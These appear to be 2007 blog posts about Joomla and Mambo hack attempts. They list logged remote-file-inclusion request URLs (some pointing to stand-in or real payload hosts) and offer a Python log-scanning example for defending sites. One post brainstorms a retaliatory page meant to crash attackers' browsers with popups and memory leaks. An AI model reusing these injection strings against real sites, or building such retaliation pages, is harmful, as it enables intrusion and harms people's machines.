Fun With A Noindex Page
Tuesday, 12 June 2007
As everyone who has ever read my blog probably knows by now, I have noticed a large increase in the number of hack attempts upon my Joomla-based site. I currently have a little fun with these hackers, and have decided to make my noindex page a bit of a honeypot experiment. In the recent zipfile I posted of strings these hackers use, as well as their scripts, I copied the strings and pasted them in the bottom of my noindex.html page. Then, I stuffed the page with Google ads (may as well try to make a buck off of them, huh?), and ran it through the QUIT indexing tool. Hopefully, my site's hack attempts will all be constrained to only my noindex.html page, rather than my actual site from now on.

Some friends of mine, as well as myself, have been discussing measures to further mess with these would-be hackers. Don't get me wrong, I consider myself a hacker, but more of a white/greyhat, and not a cracker or defacer. We are eventually going to build a noindex page to rule them all, one that will do lots of fun things to the attacker's browser/script, hopefully shutting or slowing him/her down. Some ideas we have had include the following:

  • Millions of popup windows, going to user chosen locations, like ads, affiliate sites, Goatse, etc...
  • Refresh every x seconds, popping up all of the windows again
  • Create a memory leak somehow
  • Have the hacker's machine attempt to calculate Pi through their browser
  • Use portions of other crash scripts from around the web
  • Offer to install weather spyware, bonzi buddy, etc...
  • The list goes on
The only problem is that I stink at PHP, as well as Java. I can do templates, but that is about the full extent of my web language abilities. Anybody have any ideas, or code you would like to contribute? If so, just leave a comment and we can get in touch. Otherwise, go to I-Hacked and submit a worthwhile article to get a free membership. Then, you can discuss the project in there with us.
 
KDE Font Article Updated
Monday, 11 June 2007
I updated the Sharp Fonts in KDE article today with information on improving fonts within some GTK applications. Here it is, in case you don't want to scroll to the bottom of that article:


Some GTK Apps
For some GTK apps, it is possible to make the fonts look nice. For example, without the next tweak, Automatix's fonts would look like garbage. Open a terminal and type "sudo vim ~/.gtkrc.mine" then hit the "I" key. Copy and paste the below text into the terminal:

style "user-font"
{
fontset="-microsoft-tahoma-medium-r-normal-*-10-&#-*-p-&#"
}
widget_class "*" style "user-font"

Then, hit the "Esc" key, and type :wq (colon "w" "q"), and hit enter. All done!
 
Scripts Hackers Attempt to Inject
Sunday, 10 June 2007
I have had lots of code injection attempts as of late, and none have been successful. What the people behind these attacks are doing fits into two categories:

1. They are hacking sites just to display a "hacked by" page, to get more cred among the hacker community
2. They are using these injection scripts to run shell scripts to control the server which is then used for DoS, as well as other nefarious activities.

How do "they" find potentially vulnerable sites? They use a list of strings to search for in Google, and I happen to have it. Get it here, and block all of these URLs (or those that apply to your CMS) in your .htaccess file, or by some other means.

I have gone through my server logs, and posted my Joomla URLs that people attempt to inject code into, with the hope that people will block them in .htaccess to prevent security issues. Also, I highly suggest you make sure the PHP fopen() function is disabled in your php.ini, to prevent remote files from being opened by your server.

Alongside these URLs, I have grabbed copies of all of the scripts these hackers are using, most of which are hosted on hacked sites. In the downloads area, you will find a zipped pack of these scripts, which also has places they are hosted. I hope that someone more skilled in security and PHP can use these for the benefit of webmasters like myself.

One More Example


 
You Know You're Addicted to Computers When...
Thursday, 07 June 2007
 You go to a McDonalds 15min from your house to use the WiFi because you live in the middle of nowhere with only dialup, arriving at 9PM, and leaving past 2AM. Seriously, though, I shouldn't have done this. I really need to branch out and do more than computer crap. I was trying to compile PHP5 with fastcgi so that I could install APC cache to improve my site's performance. As it turns out, this crap is hard to compile, and I am going to give up and perhaps outsource it sometime, unless anyone out there wants to give free help in the comments below... (Installing PHP5 on Dreamhost shared hosting...I don't suggest it if you can avoid it...sheesh!)
 
Security Notice: Mambo and Joomla Hack Attempts More Rampant
Wednesday, 06 June 2007
Updated 6/10/2007

MAJOR UPDATE! - This is a file used to find "vulnerable" sites using Google. Coincidentally, it contains strings that you should block in your .htaccess file.

It seems that many hackers (mostly Turkish, according to my server logs) have been attempting to break into Joomla and Mambo based sites. They usually attack just by requesting a URL that at the same time would be able to change your CMS settings if you aren't up to date, and hardened. Some of these URLs include the following:

/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.theirsite.com/code.txt
//administrator/components/com_mamboboard/file_upload.php=http://www.evilcode.com 
/projects/libraries/pcl/pcltar.php
/site-announcements//administrator/components/com_uhp/uhp_config.php 
/administrator/components/com_babackup/classes/Tar.php
//administrator/components/com_mamboboard/file_upload.php=http://theirevilurl.com
//administrator/components/com_remository/admin.remository.php http://www.evilcode.com/
/administrator/components/com_a6mambocredits/admin.a6mambocredits.php
/administrator/components/com_comprofiler/plugin.class.php
/administrator/components/com_cropimage/admin.cropcanvas.php
/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php
/administrator/components/com_mgm/help.mgm.php
/administrator/components/com_remository/admin.remository.php
/administrator/components/com_serverstat/install.serverstat.php
/administrator/components/com_uhp/uhp_config.php
/administrator/components/com_webring/admin.webring.docs.php
/components/com_artlinks/artlinks.dispnew.php
/components/com_cpg/cpg.php
/components/com_galleria/galleria.html.php
/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php
/components/com_performs/performs.php
/components/com_phpshop/toolbar.phpshop.html.php
/components/com_rsgallery/rsgallery.html.php
/components/com_smf/smf.php
/components/com_zoom/includes/database.php
//function.is-dir
/function.is-dir
//administrator/components/com_remository/admin.remository.php
/function.require
/function.require-once
/components/com_zoom/classes/iptc/EXIF_Makernote.php
//components/com_joomlaboard/file_upload.php
/administrator/:/www.mattparnell.com/index.php
/projects//components/com_joomlaboard/file_upload.php
/projects/top-10-must-have-joomla-addons.html//components/com_joomlaboard/file_upload.php
/projects//components/com_joomlaboard/file_upload.php
///administrator/components/com_mgm/help.mgm.php
//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php
//administrator/components/com_uhp/uhp_config.php
//classes/adodbt/sql.php
//components/com_cpg/cpg.php
//components/com_mtree/Savant2/Savant2_Plugin_textarea.php
//components/com_phpshop/toolbar.phpshop.html.php
//components/com_rsgallery/rsgallery.html.php
/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php
/components/com_performs/performs.php
/dministrator/components/com_remository/admin.remository.php
/shady-stuff/interesting-open-directories.htmljavascript:ac_smilie(

New as of June 9:

/'<a
/allinurl:%22.php
//administrator/components/com_serverstat/install.serverstat.php
//components/com_remository/admin.remository.php
//components/com_zoom/classes/iptc/EXI_Makernote.php
//performs.php
/administrator/index2.pp
/components/com_videodb/core/videodb.class.xml.php
/components/com_zoom/classes/iptc/EXIF.php
/com_mtreehttp://efardella.cinet.it/claroline/phpbb/id.txt
/com_uhphttp://jargo.phpnet.us/ilkom.txt
/site-announcements//components/com_remository/admin.remository.php
/site-announcements/components/com_rsgallery/rsgallery.html.php

Note that the one in bold is the one that I see attempted the most. I suggest you upgrade to the latest stable version of Mambo or Joomla, and implement .htaccess blocks to redirect people going to these addresses to a noindex.html page (don't click, mine loops in infinite redirects to itself...I need to get it to make a popup of itself onload at some point too, to make life even harder for the would-be hacker)...
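
To find requests like the ones listed above in your own access logs, here is a small log scanner. It is an added example, not code from this site or from the script pack mentioned in the posts. It flags three things visible in the list: a remote URL embedded in the request, query keys that try to overwrite GLOBALS, _REQUEST[...] or mosConfig_* values, and direct requests for component PHP files, with repeated slashes collapsed so that //administrator and /administrator are treated alike. The function names, the sample log lines and the host remote.example are assumptions made for the example.

```python
import re
from urllib.parse import unquote

# Request line inside an Apache access-log entry: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A remote URL anywhere in the request target (the include payload).
REMOTE_URL = re.compile(r"(?:https?|ftp)://", re.I)
# Query keys that try to overwrite PHP globals or Mambo/Joomla config values.
GLOBAL_OVERWRITE = re.compile(r"(?:^|&)(?:GLOBALS=|_REQUEST\[|mosConfig_\w+=)", re.I)
# Direct requests for component PHP files, as in most of the paths listed above.
COMPONENT_PHP = re.compile(r"/(?:administrator/)?components/com_\w+/.*\.php$", re.I)


def classify(target):
    """Return the reasons a request target looks like an inclusion probe."""
    decoded = unquote(target)            # also catches http%3A%2F%2F...
    path, _, query = decoded.partition("?")
    path = re.sub(r"/{2,}", "/", path)   # '//administrator' == '/administrator'
    reasons = []
    if REMOTE_URL.search(decoded):
        reasons.append("remote-url")
    if GLOBAL_OVERWRITE.search(query):
        reasons.append("global-overwrite")
    if COMPONENT_PHP.search(path):
        reasons.append("component-php")
    return reasons


def scan(lines):
    """Return (client, target, reasons) for every log line that gets flagged."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if m and (reasons := classify(m.group(2))):
            hits.append((m.group(1), m.group(2), reasons))
    return hits


# Constructed sample log lines (documentation IPs, placeholder host remote.example).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Jun/2007:04:12:01 +0000] "GET /index.php?_REQUEST[option]=com_content&GLOBALS=&mosConfig_absolute_path=http://remote.example/code.txt HTTP/1.1" 200 512',
    '192.0.2.11 - - [10/Jun/2007:04:12:09 +0000] "GET //administrator/components/com_uhp/uhp_config.php HTTP/1.1" 404 310',
    '198.51.100.7 - - [10/Jun/2007:04:13:30 +0000] "GET /index.php?option=com_content&task=view&id=12 HTTP/1.1" 200 8120',
    '192.0.2.12 - - [10/Jun/2007:04:14:02 +0000] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http%3A%2F%2Fremote.example%2Fid.txt HTTP/1.1" 404 310',
]

if __name__ == "__main__":
    for client, target, reasons in scan(SAMPLE_LOG):
        print(client, ",".join(reasons), target)
```

A "remote-url" hit on its own can also be a legitimate redirect parameter, so treat it as a lead to check rather than proof; the combinations are the stronger signal.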
 

© Matt Parnell's Brain: Plugged In!